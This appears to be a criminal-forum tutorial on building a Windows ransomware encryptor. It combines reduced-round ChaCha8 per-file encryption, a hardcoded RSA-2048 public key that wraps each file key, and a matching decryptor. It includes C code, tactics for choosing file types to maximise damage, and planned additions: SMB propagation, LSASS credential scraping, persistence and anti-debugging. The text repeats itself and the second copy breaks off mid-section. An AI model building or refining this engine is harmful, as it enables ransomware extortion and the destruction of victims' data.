A Practical Tutorial for ChaCha20 + RSA Hybrid File Encryption on Windows: Writing an Encryption/Decryption Engine + KeyGenerator
Author: REMIO | Source: https://xss.pro
Contents:
I: Introduction & Mechanics of the ChaCha20 Library
II: RSA & asymmetric encryption
III: Writing the encryptor engine
IV: Writing the decryptor
V: Conclusion & Future Directions
Github Link to ChaCha Library: https://github.com/RemyQue/ChaCha20-ecrypt-library
Github Link to Full Project: https://github.com/RemyQue/Hybrid-Encryption-ChaCha-RSA
I. Introduction
In this walkthrough I will explore a solution to Windows based hybrid file encryption and walk you through writing a multi threaded hybrid encryption engine & decryptor, namely the ChaCha20 stream cipher, alongside RSA-2048 for key encapsulation. This initial walkthrough will focus primarily on understanding the core encryption algorithms and the implementation of the encryption engine itself. We’ll break down how ChaCha20 operates to encrypt data efficiently and how RSA-2048 is used to securely wrap the encryption keys. In future versions of this tutorial, we will expand the scope by introducing additional features such as on-the-fly key generation, thread pool optimization for improved performance, partial file encryption, and various obfuscation techniques to enhance security. The ultimate goal is to develop a robust and scalable hybrid encryption system specifically tailored for Windows environments….
The ChaCha20 algorithm has gained significant attention in recent years, partly due to its adoption by several well known ransomware variants. This widespread use is understandable given ChaCha20’s efficiency and speed, especially when compared to traditional encryption methods like AES-CBC and AES-GCM. ChaCha20 is a stream cipher closely related to Salsa20, an earlier cipher also designed by Bernstein in 2005. Salsa20 was submitted to the EU’s eSTREAM cryptographic validation process and gained recognition for its security and performance. In 2008, ChaCha was then introduced as a modified version of Salsa20, featuring a new round function that enhances diffusion and improves performance on certain hardware architectures, making it both faster and more secure in practical applications.
Understanding the Mechanics of the ChaCha20 Library
Like its predecessor Salsa20, ChaCha20 essentially operates by generating a pseudorandom keystream that is combined with plaintext data to produce ciphertext, making it highly efficient for encrypting data streams. Both algorithms use a similar internal structure based on quarter-round functions (A round function is a process that mixes and scrambles data to enhance security and create a pseudorandom output, these get repeated x number of times in the cipher, 8 are actually used here) and operate on 512bit blocks, but ChaCha20 introduces a modified round function that increases diffusion (mixes input bits more thoroughly each round, enhancing security). Additionally, ChaCha20 is optimized for better performance on a wider range of hardware, making it a more practical choice in many use cases.
Lets look here at a chacha20 implementation we saw used in the 2022 Conti source leaks, and from then on some other encryptors. This library is well designed and has a modular / reusable design that separates platform detection, portable implementations, optimizations and API layers for maintainability across different systems. We will look here however in the context of Windows. The library also demonstrates a pretty straightforward & performance focused approach of a stream cipher in c so we'll examines how the mathematical operations of the ChaCha algorithm are translated into efficient C code.
The chacha20/library consists of 7 main files:
Core Data Structures
The cipher maintains its entire state in a simple structure containing 16 x 32bit words. This design choice prioritizes speed and simplicity over memory optimization:
This ECRYPT_ctx structure contains a single array called input consisting of 16 elements of 32bit unsigned integers (u32). These 16 words form the complete internal state of the cipher. This layout is actually typical for stream ciphers likeas Salsa20 & ChaCha. The state is usually composed of a combination of constants, the encryption key, a nonce (or Initialisation Vector, or IV, essentially a fixed size input used with a secret key for encryption and decryption) and a block counter.
The comment "could be compressed" hints at a conscious design decision here. Although the internal state might technically be represented more compactly, maybe by reducing word size or storing data more efficiently, the developers deliberately choose not to do this. The primary reason for this is performance. In cryptographic applications like this speed is critical. A flat, fixed size structure like this allows for rapid & predictable access to each part of the state and simplifies the implementation of transformation functions during encryption and decryption. This is a classic design tradeoff. While a compressed structure might save a small amount of memory, it could complicate the code, introduce subtle bugs, and slow down execution due to additional processing. By choosing a straightforward and slightly memory inefficient structure, the developers gained clearer code, faster state updates, and better compatibility with hardware optimized or performance sensitive environments.
ChaCha8 Variant: Use of the Reduced Round variant
This implementation uses only 8 rounds instead of the standard ChaCha20's 20 rounds, as evidenced by the cipher name "ChaCha8" in ecrypt-sync.h and the main encryption loop:
The loop runs 4 times (i starts at 8, decrements by 2 each iteration), with each iteration performing 8 quarter-rounds (4 column + 4 diagonal), totaling 32 quarter rounds or 8 full rounds. This is a deliberate performance optimization - ChaCha8 runs 2.5x faster than ChaCha20 while still providing substantial security for ransomware applications where speed is prioritized over maximum cryptographic strength.
The Quarter-round Function
The core cryptographic operation is implemented as a macro rather than a function to eliminate call overhead:
Each line here performs a specific mixing operation:
The rotation amounts (16, 12, 8, 7) were carefully chosen by the ChaCha designers to provide optimal diffusion of bits across the state.
Primitive Operation Macros
The library abstracts basic operations into macros for portability and potential optimization:
State Layout and Initialization
The 16 word state follows ChaCha's standard layout, designed for efficient mixing:
Words 0-3: Fixed constants that prevent related-key attacks
Words 4-11: The encryption key (256-bit or 128-bit repeated)
Words 12-13: Block counter that increments for each 64-byte block
Words 14-15: Nonce/IV that should be unique for each message
Key Setup
The key setup function handles both 128bit and 256 bit keys, adapting the state initialization accordingly to maintain compatibility with different operational modes. For 256bit key the function directly loads the full key into the state words reserved for key material, ensuring that the entire secret is used as intended.
In the case of a 128 bit key, the function duplicates the key to fill the key words, a common practice in chacha variants to maintain consistent state size without weakening security drastically. Also the setup process carefully accounts for endiannes by converting input bytes into the correct 32-bit word format expected by the algorithm. This ensures the cipher behaves consistently across different CPU architectures (little endian vs. big endian), avoiding subtle bugs or security flaws caused by incorrect byte ordering. Overall, the key setup is designed to be robust, flexible, and portable, setting a strong foundation for the subsequent encryption rounds.
The U8TO32_LITTLE macro converts 4 bytes from the key array into a 32 bit word in little endian format, ensuring consistent behaviour across different CPU architectures. To account for 128 bit keys the same key material is used twice to fill the 256 bit key space.
So… Why this library?
Overall this library employs a nice range of deliberate design choices to maximize speed and efficiency. By opting for ChaCha8 instead of ChaCha20, it achieves roughly a 2.5x performance boost while maintaining sufficient security for its intended use. The use of macros instead of function calls removes call overhead, and defining local variables (x0–x15) allows the compiler to allocate them directly to CPU registers, speeding up access. Loop unrolling minimizes branching and control overhead, while omitting error checking and bounds validation reduces code size and runtime delays. Direct memory operations eliminate dependencies on external libraries, streamlining integration and minimizing latency.
The Conti ChaCha8 library exemplifies how reduced-round symmetric encryption can be effectively leveraged in encryptors to optimize throughput without sacrificing necessary security. Its modular architecture, focus on speed through ChaCha8, minimal error handling, and avoidance of standard libraries make it particularly suited for high-throughput, multithreaded encryption tasks. Overall, this implementation reflects a mature, performance-driven approach to cryptographic engine design commonly found in advanced malware. So great, we can start encrypting files…?
Not quite, before diving into the process of encrypting files using this library, it’s essential to first address how the encryption key itself is secured. Symmetric encryption algorithms like ChaCha8 require both the sender and receiver to have access to the same secret key, which presents a challenge for our safe key distribution. To solve this, we first need to select and implement an asymmetric encryption method like as RSA, to encrypt and protect the ChaCha8 key. This hybrid approach ensures that even if the communication channel is monitored, the symmetric key remains secure. In the next section, we’ll explore how RSA can be used effectively to encrypt the ChaCha8 key, enabling a secure and efficient file encryption pipeline.
II. RSA Integration for Key Encapsulation
While ChaCha8 handles the actual file encryption, with exceptional speed at that, we need some sort of method of securing this key before its ever saved or sent off. The implementation we will be working with shall use RSA2048 for key encapsulation: a hybrid approach that combines the performance benefits of symmetric encryption with the security advantages of asymmetric cryptography. RSA (Rivest-shamir-adleman) is a widely used public key cryptosystem that enables secure key exchange without requiring prior shared secrets between parties.
So Rather than encrypting file content directly with RSA (which would be extremely slow for large or many files), the system generates random ChaCha8 keys and IVs for each file, then encrypts these small key materials using the RSA public key. This approach leverages RSA's strength in secure key exchange while avoiding its performance limitations for bulk data encryption. The 2048bit RSA key provides substantial security equivalent to approximately 112 bits of symmetric security making it computationally infeasible for attackers to recover the ChaCha8 keys even if they possess the encrypted files. Each file gets its own unique ChaCha8 key/IV pair, ensuring that compromising one file's encryption doesn't affect others. We shall explore this methodology later on when we look at encryptor design in more detail.
For simplicity and demonstration purposes I've used Windows' built in CryptoAPI rather than implementing RSA from scratch. Anyhow, the Windows CryptoAPI provides a well tested RSA functionality that integrates nicely with the system's cryptographic system so it shall do for our project. I have also not obfuscated the obfuscated RSA key, this is simply for demonstration purposes and simplicity and we will come to obfuscating later on.
That said, while RSA is still fine in my opinion for secure key exchange. Modern encryption schemes however often rely on more efficient algorithms like ChaCha20-Poly1305, ECDSA, X25519 or whatever. Anyhow, the key point is that the standard approach today is hybrid encryption: asymmetric algorithms such as RSA or elliptic curve methods like ECDH are used to securely handle the symmetric key, while a fast symmetric cipher like ChaCha20-Poly1305 encrypt the actual data. Data is protected using a lightweight symmetric cipher, while the key is safeguarded by a robust asymmetric technique.
Key Generation and Encapsulation Process
The RSA encapsulation process follows a straightforward workflow. For each target file, the system generates a fresh 32-byte ChaCha8 key and 12-byte initialization vector using the Windows cryptographically secure random number generator. These key materials are then concatenated and encrypted using the RSA public key:
To wrap up this section, we use Win CryptoAPI for a simple yet effective solution by abstracting complex cryptographic details such as padding schemes like PKCS#1 (I constantly have headaches with padding schemes for reasons unknown). This allows our walk through focus on integrating ChaCha8 and file processing without getting bogged down in RSA intricacies. The hardcoded public key approach further simplifies deployment by removing the need for key distribution.
RSA Key generator:
III. Writing the Hybrid Crypto Logic
Now that we’ve established our ChaCha8 library and RSA key encapsulation system, let’s examine how we can use these components together in a complete file encryption implementation. The hybrid approach we’ll take demonstrates how to efficiently process multiple files using a multi threaded architecture while maintaining decently strong cryptographic security.
The core challenge in designing an effective file encryption system lies in balancing cryptographic strength, performance throughput and system resource utilization. Our implementation addresses this through a producer/consumer threading model combined with adaptive encryption strategies that optimize processing based on file characteristics. The system maintains separate encryption contexts per file while leveraging shared cryptographic providers to minimize th e initialization overhead.
Core Data Structures and Memory Management
The implementation relies on several key structures that organize file information, encryption context and work distribution. These structures are designed to minimize memory allocations and enable efficient data flow between threads.
The FILE_HEADER structure serves as the cryptographic metadata container appended to each encrypted file. It stores the RSA encrypted ChaCha8 key material, encryption mode indicators for the decryption process and the original file size required for proper file reconstruction. The ENCRYPTED_KEY_SIZE of 524 bytes accommodates the RSA2048 encrypted output with PKCS#1 padding ensuring sufficient space for the 44byte key + IV combination after RSA encryption.
The FILE_INFO structure maintains the complete encryption context for a single file operation. It contains both plaintext ChaCha8 materials (which are zeroed after use) and the RSA encrypted key data that persists in the file header. The embedded chacha_ctx maintains the algorithm’s internal state, allowing for streaming encryption operations across multiple buffer chunks without reinitializing the cipher context.
Multithreading
To maximize encryption throughput across modern multiple cores, the implementation employs a threadsafe producer/consumer pattern. This architecture decouples file discovery from encryption processing, allowing the most optimal resource utilization.
The work queue uses Windows synchronization primitives to coordinate between the main discovery thread and multiple worker threads while the critical section protects queue modifications while the semaphore provides efficient thread blocking and signalling. A fixed size queue (1000 items) prevents unbounded memory growth during large directory traversals while providing sufficient buffering for sustained throughput.
The worker threads operate independently with dedicated 5MB buffers (allocated via VirtualAlloc) for optimal memory alignment and reduced fragmentation. Each thread maintains its own buffer to eliminate contention and enable true parallel processing of multiple files simultaneously.
Adaptive Encryption Strategies Based on File Characteristics
Rather than applying uniform encryption to all files, the system employs intelligent strategies based on file type and size characteristics. This approach optimizes for both processing speed and operational impact while maintaining cryptographic security.
The adaptive strategy recognizes that different file types have varying sensitivity to partial corruption. Database files receive complete encryption since any corruption typically renders them entirely unusable, maximizing operational impact. Virtual machine files use targeted partial encryption at 20% coverage, which corrupts critical metadata while maintaining enough structure to suggest recoverability. For general files, the size-based approach balances processing time with effectiveness. Files under 1MB are fully encrypted with minimal performance impact, while files between 1-5MB receive header-only encryption that corrupts file format signatures and metadata. Large files over 5MB use 50% partial encryption distributed across the file to ensure sufficient corruption while maintaining reasonable processing times.
ChaCha8 Integration and Cryptographic Key Management
The integration between RSA key protection and ChaCha8 file encryption demonstrates proper hybrid cryptography implementation. Each file receives cryptographically independent key material while leveraging shared RSA infrastructure for key protection.
The key generation process uses Windows CryptoAPI's CryptGenRandom function, which provides cryptographically secure pseudorandom number generation (PRNG) suitable for key material. Each file receives a fresh 32byte ChaCha8 key and 8-byte IV, ensuring cryptographic independence between files. The ChaCha8 context initialization prepares the cipher's internal state for subsequent encryption operations.
The RSA encryption combines the 32-byte key and 8byte IV into a 40byte payload, which is then encrypted using the public key with PKCS#1 v1.5 padding. This results in a 256-byte ciphertext for RSA2048, providing both confidentiality and integrity for the symmetric key material. The padding scheme ensures semantic security, making identical key+IV combinations produce different RSA ciphertexts.
Streaming File Processing and Header Management
The system processes files using streaming operations to maintain constant memory usage regardless of file size. This approach enables encryption of arbitrarily large files while preserving system responsiveness and memory efficiency.
The header-at-end approach allows the encryption process to work with file contents first, then append the decryption metadata. This design simplifies the encryption logic since it doesn’t require shifting existing file data to accommodate a header at the beginning. The header contains all information necessary for decryption: the RSA-encrypted key material, encryption mode indicators, percentage of data encrypted, and original file size for proper restoration.
The WriteFullData function ensures atomic write operations by handling partial writes that can occur with large buffers or under system load. It continues writing until all data is committed to storage, preventing corruption from incomplete writes that could render files unrecoverable even with the correct decryption key.
Performance Optimizations and Buffer Management
Several design decisions optimize encryption throughput while maintaining cryptographic security. The implementation prioritizes streaming operations, buffer reuse, and minimal system call overhead to achieve maximum performance.
The streaming approach processes files in 5MB chunks. Each worker thread maintains a dedicated buffer allocated with VirtualAlloc for optimal memory alignment and reduced fragmentation. Inplace encryption minimizes memory copies by using the same buffer for both input and output data, taking advantage of chacha8 ability to encrypt data in place without requiring separate source and destination buffers. File pointer manipulation using SetFilePointerEx with negative offsets enables the read encrypt write back pattern necessary for the in place file modification. This approach avoids creating temporary files while ensuring the original file content is properly overwritten with encrypted data, crucial for encryptor usecase. The LARGE_INTEGER file positioning supports files larger than 4GB, ensuring compatibility with modern file sizes.
Cryptographic Hygiene
The implementation incorporates several design elements that ensure good cryptographic strength while preventing common vulnerabilities. These measures provide defense against both cryptographic attacks & exploits. Proper resource management ensures that file handles are closed before renaming operations, preventing sharing violations that could leave files in inconsistent states and we gracefully handle locked files by skipping them rather than failing, maintaining operational continuity in multi user environment where files may be actively in use. Any memory containing sensitive key material should be securely cleared after use using SecureZeroMemory or similar functions to prevent key recovery from mrmory dumps or swap files, though this detail is omitted from the shown code for brevity.
Excellent, now lets write the decryptor…
IV. Writing the Hybrid Decryption Logic
The decryption process essentially reverses our encryption workflow, but requires careful attention to key recovery, file integrity validation and proper restoration of original file structures to ensure we dont fuck our data. Our decryptor will safely reconstruct files from their encrypted state while maintaining the same multithreaded architecture for optimal performance.
The core challenge in decryption lies in securely recovering the ChaCha8 key material from RSA encrypted headers and ensuring complete file restoration without data loss. Our implementation addresses this through systematic header parsing, robust key decryption, and adaptive processing strategies that mirror the original encryption modes.
Key Recovery & RSA Decryption
The decryption process begins with importing the RSA private key and establishing the cryptographic context. Unlike the encryptor which generates keys the decryptor must locate and import existing private key material to recover the symmetric encryption keys.
The key import process requires the RSA private key file generated during encryption. This file contains the PRIVATEKEYBLOB exported by the encryptor, allowing the decryptor to recover the original RSA key pair needed for symmetric key decryption.
Header Parsing and Metadata Recovery
Each encrypted file contains a FILE_HEADER structure appended at the end, containing all metadata necessary for proper decryption. The decryptor must carefully parse this header to recover encryption parameters and the RSA-encrypted ChaCha8 key material.
The header reading process removes the metadata from the file during parsing, immediately restoring the file to its encrypted-content-only state. This approach ensures that the decryption process works with clean file boundaries matching the original encrypted data size.
ChaCha8 Key Recovery and Context Initialization
Once the header is parsed, the RSA-encrypted key material must be decrypted to recover the original ChaCha8 key and IV. This process requires careful handling of the PKCS#1 padding and proper initialization of the ChaCha8 context.
The key recovery process uses the same ChaCha8 context initialization as encryption. Since ChaCha8 is a stream cipher, the same keystream used for encryption will perfectly reverse the process when applied to the encrypted data, restoring the original plaintext.
Adaptive Decryption Based on Encryption Mode
The decryptor must support the same adaptive strategies used during encryption, processing files according to their stored encryption mode and parameters. This ensures proper restoration regardless of which encryption strategy was originally applied.
Mode based processing ensures that files encrypted with different strategies are properly restored. DataPercent field from the header provides the exact parameters needed to reconstruct partially encrypted files with the correct block sizes and step intervals.
Streaming Decryption and File Restoration
The decryption process mirrors the encryption streaming approach, processing files in chunks while maintaining constant memory usage with key difference is that ChaCha8's symmetric nature allows the same encryption function to serve as decryption.
Streaming decryption maintains the same in place processing approach as encryption, minimizing memory overhead and enabling efficient processing of large files. The originalFileSize from the header ensures that decryption processes exactly the correct amount of data, preventing over-processing that could corrupt the restored file.
File Restoration and Extension Management
Once decryption is complete, the system must restore the original filename by removing the encryption extension. This process ensures that decrypted files return to their original state and can be properly accessed by applications.
The filename restoration includes retry logic to handle temporary file system locks or sharing violations that might prevent immediate renaming. This approach ensures smooth operation in multi user environments where files might be briefly locked by EDRs or other system processes. The decryptor includes comprehensive error handling to manage various failure scenarios gracefully. Invalid headers, corrupted key material, or incomplete files are detected and handled without crashing the decryption process. Files that cannot be decrypted due to corruption, missing headers, or invalid keys are skipped rather than causing the entire process to fail. This ensures that partial recovery is possible even when some files in a dataset are damaged. The multi-threaded architecture maintains processing continuity, allowing successful decryptions to proceed while problematic files are handled separately. The implementation also includes proper cleanup of cryptographic resources and file handles, ensuring that system resources are released even when errors occur during processing. This approach maintains system stability and prevents resource leaks that could impact system performance during large-scale decryption operations. And there we have it. Our Basic Encryptor / Decryptor and key generator.
V. Conclusion and Future Directions
So there we have it, our project now combines a reduced-round ChaCha8 stream cipher for high-speed symmetric encryption with RSA-2048 for secure per-file key encapsulation. The hybrid model we’ve implemented is designed to be simple, efficient, and highly modular — separating the encryption logic, key management, threading system, and file handling into clean, swappable components. The result is a fast, multithreaded engine capable of encrypting large volumes of files with minimal resource overhead.
Nice.
At this stage our implementation is primarily educational. A clear, working demonstration of modern crypto principles in action. But there’s plenty of room to expand. Planned improvements include full drive enumeration and smarter file discovery techniques using system APIs and registry lookups, enabling deeper reach across local and removable volumes. On the cryptographic side, the current hardcoded RSA key can be replaced with dynamic key generation and possibly elliptic curve based methods like X25519 for faster, smaller key exchange. We can also looking into refining the threadpool architecture to support better scaling on multi core systems. Integrating a scanning module would allow enumeration of SMB shares, remote drives, and nearby hosts pushing the system beyond the local machine. Combined with LSASS memory scraping or token impersonation, it could automatically propagate and encrypt across an entire subnet. Stealth enhancements are also on the table: userland anti-hooking, basic anti-debugging, simple persistence via registry or scheduled tasks, and eventually code obfuscation to make reverse engineering harder. Realistically theres a LOT to be added to make this even remotely close to a functional encryptor for real use cases, however thee cryptographic foundations and engine is solid for demonstrative purposes.
Thanks for reading.
- Remy
”Take more chances, dance more dances…”
Author: REMIO | Source: https://xss.pro
Contents:
I: Introduction & Mechanics of the ChaCha20 Library
II: RSA & asymmetric encryption
III: Writing the encryptor engine
IV: Writing the decryptor
V: Conclusion & Future Directions
Github Link to ChaCha Library: https://github.com/RemyQue/ChaCha20-ecrypt-library
Github Link to Full Project: https://github.com/RemyQue/Hybrid-Encryption-ChaCha-RSA
I. Introduction
In this walkthrough I will explore a solution to Windows based hybrid file encryption and walk you through writing a multi threaded hybrid encryption engine & decryptor, namely the ChaCha20 stream cipher, alongside RSA-2048 for key encapsulation. This initial walkthrough will focus primarily on understanding the core encryption algorithms and the implementation of the encryption engine itself. We’ll break down how ChaCha20 operates to encrypt data efficiently and how RSA-2048 is used to securely wrap the encryption keys. In future versions of this tutorial, we will expand the scope by introducing additional features such as on-the-fly key generation, thread pool optimization for improved performance, partial file encryption, and various obfuscation techniques to enhance security. The ultimate goal is to develop a robust and scalable hybrid encryption system specifically tailored for Windows environments….
The ChaCha20 algorithm has gained significant attention in recent years, partly due to its adoption by several well known ransomware variants. This widespread use is understandable given ChaCha20’s efficiency and speed, especially when compared to traditional encryption methods like AES-CBC and AES-GCM. ChaCha20 is a stream cipher closely related to Salsa20, an earlier cipher also designed by Bernstein in 2005. Salsa20 was submitted to the EU’s eSTREAM cryptographic validation process and gained recognition for its security and performance. In 2008, ChaCha was then introduced as a modified version of Salsa20, featuring a new round function that enhances diffusion and improves performance on certain hardware architectures, making it both faster and more secure in practical applications.
Understanding the Mechanics of the ChaCha20 Library
Like its predecessor Salsa20, ChaCha20 essentially operates by generating a pseudorandom keystream that is combined with plaintext data to produce ciphertext, making it highly efficient for encrypting data streams. Both algorithms use a similar internal structure based on quarter-round functions (A round function is a process that mixes and scrambles data to enhance security and create a pseudorandom output, these get repeated x number of times in the cipher, 8 are actually used here) and operate on 512bit blocks, but ChaCha20 introduces a modified round function that increases diffusion (mixes input bits more thoroughly each round, enhancing security). Additionally, ChaCha20 is optimized for better performance on a wider range of hardware, making it a more practical choice in many use cases.
Lets look here at a chacha20 implementation we saw used in the 2022 Conti source leaks, and from then on some other encryptors. This library is well designed and has a modular / reusable design that separates platform detection, portable implementations, optimizations and API layers for maintainability across different systems. We will look here however in the context of Windows. The library also demonstrates a pretty straightforward & performance focused approach of a stream cipher in c so we'll examines how the mathematical operations of the ChaCha algorithm are translated into efficient C code.
The chacha20/library consists of 7 main files:
- ecrypt-config.h: Platform detection and type definitions
- ecrypt-portable.h: Portable macros for crypto operations
- ecrypt-machine.h: Platform-specific optimizations
- ecrypt-sync.h: API interface definitions
- chacha.c: Core ChaCha algorithm implementation
- chacha.h: Simplified public interface
- chacha_adapter.c: Bridge between ECRYPT and simplified APIs
Core Data Structures
The cipher maintains its entire state in a simple structure containing 16 x 32bit words. This design choice prioritizes speed and simplicity over memory optimization:
C:
typedef struct {
u32 input[16]; /* could be compressed */
} ECRYPT_ctx;
This ECRYPT_ctx structure contains a single array called input consisting of 16 elements of 32bit unsigned integers (u32). These 16 words form the complete internal state of the cipher. This layout is actually typical for stream ciphers likeas Salsa20 & ChaCha. The state is usually composed of a combination of constants, the encryption key, a nonce (or Initialisation Vector, or IV, essentially a fixed size input used with a secret key for encryption and decryption) and a block counter.
The comment "could be compressed" hints at a conscious design decision here. Although the internal state might technically be represented more compactly, maybe by reducing word size or storing data more efficiently, the developers deliberately choose not to do this. The primary reason for this is performance. In cryptographic applications like this speed is critical. A flat, fixed size structure like this allows for rapid & predictable access to each part of the state and simplifies the implementation of transformation functions during encryption and decryption. This is a classic design tradeoff. While a compressed structure might save a small amount of memory, it could complicate the code, introduce subtle bugs, and slow down execution due to additional processing. By choosing a straightforward and slightly memory inefficient structure, the developers gained clearer code, faster state updates, and better compatibility with hardware optimized or performance sensitive environments.
ChaCha8 Variant: Use of the Reduced Round variant
This implementation uses only 8 rounds instead of the standard ChaCha20's 20 rounds, as evidenced by the cipher name "ChaCha8" in ecrypt-sync.h and the main encryption loop:
C:
for (i = 8; i > 0; i -= 2) {
// Column rounds
QUARTERROUND(x0, x4, x8, x12)
QUARTERROUND(x1, x5, x9, x13)
QUARTERROUND(x2, x6, x10, x14)
QUARTERROUND(x3, x7, x11, x15)
// Diagonal rounds
QUARTERROUND(x0, x5, x10, x15)
QUARTERROUND(x1, x6, x11, x12)
QUARTERROUND(x2, x7, x8, x13)
QUARTERROUND(x3, x4, x9, x14)
}
The loop runs 4 times (i starts at 8, decrements by 2 each iteration), with each iteration performing 8 quarter-rounds (4 column + 4 diagonal), totaling 32 quarter rounds or 8 full rounds. This is a deliberate performance optimization - ChaCha8 runs 2.5x faster than ChaCha20 while still providing substantial security for ransomware applications where speed is prioritized over maximum cryptographic strength.
The Quarter-round Function
The core cryptographic operation is implemented as a macro rather than a function to eliminate call overhead:
C:
#define QUARTERROUND(a,b,c,d) \
a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
Each line here performs a specific mixing operation:
- Line 1: Add a and b then XOR the result with d and rotate by 16bits
- Line 2: Add the new c and d values, then XOR with b and rotate by 12 bits
- Line 3: Repeat the add-XOR rotate pattern with an 8bit rotation
- Line 4: Final mixing step with a 7-bit rotation
The rotation amounts (16, 12, 8, 7) were carefully chosen by the ChaCha designers to provide optimal diffusion of bits across the state.
Primitive Operation Macros
The library abstracts basic operations into macros for portability and potential optimization:
C:
#define ROTATE(v,c) (ROTL32(v,c))
#define XOR(v,w) ((v) ^ (w))
#define PLUS(v,w) (U32V((v) + (w)))
#define PLUSONE(v) (PLUS((v),1))
- ROTATE uses the portable rotation macro which may be optimized for specific CPUs
- XOR is straightforward bitwise exclusive OR
- PLUS ensures 32-bit wraparound arithmetic using the U32V macro
- PLUSONE is a convenience macro for incrementing counters
State Layout and Initialization
The 16 word state follows ChaCha's standard layout, designed for efficient mixing:
Words 0-3: Fixed constants that prevent related-key attacks
Words 4-11: The encryption key (256-bit or 128-bit repeated)
Words 12-13: Block counter that increments for each 64-byte block
Words 14-15: Nonce/IV that should be unique for each message
Key Setup
The key setup function handles both 128bit and 256 bit keys, adapting the state initialization accordingly to maintain compatibility with different operational modes. For 256bit key the function directly loads the full key into the state words reserved for key material, ensuring that the entire secret is used as intended.
In the case of a 128 bit key, the function duplicates the key to fill the key words, a common practice in chacha variants to maintain consistent state size without weakening security drastically. Also the setup process carefully accounts for endiannes by converting input bytes into the correct 32-bit word format expected by the algorithm. This ensures the cipher behaves consistently across different CPU architectures (little endian vs. big endian), avoiding subtle bugs or security flaws caused by incorrect byte ordering. Overall, the key setup is designed to be robust, flexible, and portable, setting a strong foundation for the subsequent encryption rounds.
C:
void ECRYPT_keysetup(ECRYPT_ctx* x, const u8* k, u32 kbits, u32 ivbits)
{
const char* constants;
// Load first half of key (always present)
x->input[4] = U8TO32_LITTLE(k + 0);
x->input[5] = U8TO32_LITTLE(k + 4);
x->input[6] = U8TO32_LITTLE(k + 8);
x->input[7] = U8TO32_LITTLE(k + 12);
if (kbits == 256) {
k += 16; // Advance to second half of 256-bit key
constants = sigma; // "expand 32-byte k"
} else {
constants = tau; // "expand 16-byte k" for 128-bit keys
}
// Load second half (or repeat first half for 128-bit keys)
x->input[8] = U8TO32_LITTLE(k + 0);
x->input[9] = U8TO32_LITTLE(k + 4);
x->input[10] = U8TO32_LITTLE(k + 8);
x->input[11] = U8TO32_LITTLE(k + 12);
// Set the magic constants
x->input[0] = U8TO32_LITTLE(constants + 0);
x->input[1] = U8TO32_LITTLE(constants + 4);
x->input[2] = U8TO32_LITTLE(constants + 8);
x->input[3] = U8TO32_LITTLE(constants + 12);
}
The U8TO32_LITTLE macro converts 4 bytes from the key array into a 32 bit word in little endian format, ensuring consistent behaviour across different CPU architectures. To account for 128 bit keys the same key material is used twice to fill the 256 bit key space.
So… Why this library?
Overall this library employs a nice range of deliberate design choices to maximize speed and efficiency. By opting for ChaCha8 instead of ChaCha20, it achieves roughly a 2.5x performance boost while maintaining sufficient security for its intended use. The use of macros instead of function calls removes call overhead, and defining local variables (x0–x15) allows the compiler to allocate them directly to CPU registers, speeding up access. Loop unrolling minimizes branching and control overhead, while omitting error checking and bounds validation reduces code size and runtime delays. Direct memory operations eliminate dependencies on external libraries, streamlining integration and minimizing latency.
The Conti ChaCha8 library exemplifies how reduced-round symmetric encryption can be effectively leveraged in encryptors to optimize throughput without sacrificing necessary security. Its modular architecture, focus on speed through ChaCha8, minimal error handling, and avoidance of standard libraries make it particularly suited for high-throughput, multithreaded encryption tasks. Overall, this implementation reflects a mature, performance-driven approach to cryptographic engine design commonly found in advanced malware. So great, we can start encrypting files…?
Not quite, before diving into the process of encrypting files using this library, it’s essential to first address how the encryption key itself is secured. Symmetric encryption algorithms like ChaCha8 require both the sender and receiver to have access to the same secret key, which presents a challenge for our safe key distribution. To solve this, we first need to select and implement an asymmetric encryption method like as RSA, to encrypt and protect the ChaCha8 key. This hybrid approach ensures that even if the communication channel is monitored, the symmetric key remains secure. In the next section, we’ll explore how RSA can be used effectively to encrypt the ChaCha8 key, enabling a secure and efficient file encryption pipeline.
II. RSA Integration for Key Encapsulation
While ChaCha8 handles the actual file encryption, with exceptional speed at that, we need some sort of method of securing this key before its ever saved or sent off. The implementation we will be working with shall use RSA2048 for key encapsulation: a hybrid approach that combines the performance benefits of symmetric encryption with the security advantages of asymmetric cryptography. RSA (Rivest-shamir-adleman) is a widely used public key cryptosystem that enables secure key exchange without requiring prior shared secrets between parties.
So Rather than encrypting file content directly with RSA (which would be extremely slow for large or many files), the system generates random ChaCha8 keys and IVs for each file, then encrypts these small key materials using the RSA public key. This approach leverages RSA's strength in secure key exchange while avoiding its performance limitations for bulk data encryption. The 2048bit RSA key provides substantial security equivalent to approximately 112 bits of symmetric security making it computationally infeasible for attackers to recover the ChaCha8 keys even if they possess the encrypted files. Each file gets its own unique ChaCha8 key/IV pair, ensuring that compromising one file's encryption doesn't affect others. We shall explore this methodology later on when we look at encryptor design in more detail.
For simplicity and demonstration purposes I've used Windows' built in CryptoAPI rather than implementing RSA from scratch. Anyhow, the Windows CryptoAPI provides a well tested RSA functionality that integrates nicely with the system's cryptographic system so it shall do for our project. I have also not obfuscated the obfuscated RSA key, this is simply for demonstration purposes and simplicity and we will come to obfuscating later on.
That said, while RSA is still fine in my opinion for secure key exchange. Modern encryption schemes however often rely on more efficient algorithms like ChaCha20-Poly1305, ECDSA, X25519 or whatever. Anyhow, the key point is that the standard approach today is hybrid encryption: asymmetric algorithms such as RSA or elliptic curve methods like ECDH are used to securely handle the symmetric key, while a fast symmetric cipher like ChaCha20-Poly1305 encrypt the actual data. Data is protected using a lightweight symmetric cipher, while the key is safeguarded by a robust asymmetric technique.
Код:
// Hardcoded RSA public key blob (2048-bit)
const BYTE g_hardcodedPublicKey[] = {
0x06, 0x02, 0x00, 0x00, 0x00, 0xA4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31,
// … (remainder of 2048-bit public key)
};
BOOL InitializeCrypto(HCRYPTPROV* cryptoProvider, HCRYPTKEY* publicKey) {
// Acquire cryptographic context
if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV,
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return FALSE;
}
// Import the hardcoded public key
if (!CryptImportKey(*cryptoProvider, g_hardcodedPublicKey,
g_hardcodedPublicKeySize, 0, 0, publicKey)) {
CryptReleaseContext(*cryptoProvider, 0);
return FALSE;
}
return TRUE;
}
Key Generation and Encapsulation Process
